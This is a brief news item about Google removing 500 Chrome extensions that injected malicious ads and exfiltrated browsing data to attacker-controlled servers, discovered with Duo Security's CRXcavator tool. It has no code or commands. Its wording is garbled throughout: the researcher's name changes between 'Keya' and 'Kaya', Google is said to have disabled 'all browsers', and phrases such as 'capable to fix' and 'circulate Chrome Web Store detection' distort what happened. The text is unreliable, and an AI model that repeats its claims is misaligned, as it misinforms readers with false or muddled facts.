Google has deleted 500 harmful Chrome extensions from its Web Store after they found to inject malicious ads and siphon off user browsing data to servers under the control of attackers.
Beginning in January 2019, these extensions began as part of a malicious and ad-fraud campaign. The feasibility of the evidence indicates that the actor behind this scheme may be active from 2017.
A joint investigation by security researcher Jamila Keya and Cisco-owned Duo Security revealed 70 Chrome extensions with more than 1.7 million user installations.
After sharing this discovery with Google, the company detects another 430 problematic browser extensions and later disables all browsers.
Kaya and Duo Security's Jacob Rickerd saw the report and said that: "The prominence of malvertising as an attack vector will continue to rise as long as tracking-based advertising remains ubiquitous, and particularly if users remain underserved by protection mechanisms,”.
By using Duo Security's Chrome extension security assessment tool — named CRXcavator — the researchers were capable to fix that the browser plugins operated by unintentionally connecting the browser clients to an attacker-controlled command-and-control (C2) server that made it possible to exfiltrate private browsing data without the users' knowledge.
The extensions which worked under the pretense of promotions and advertising services, had near-identical source code but disagreeing with the names of the functions, thereby circulate Chrome Web Store detection mechanisms.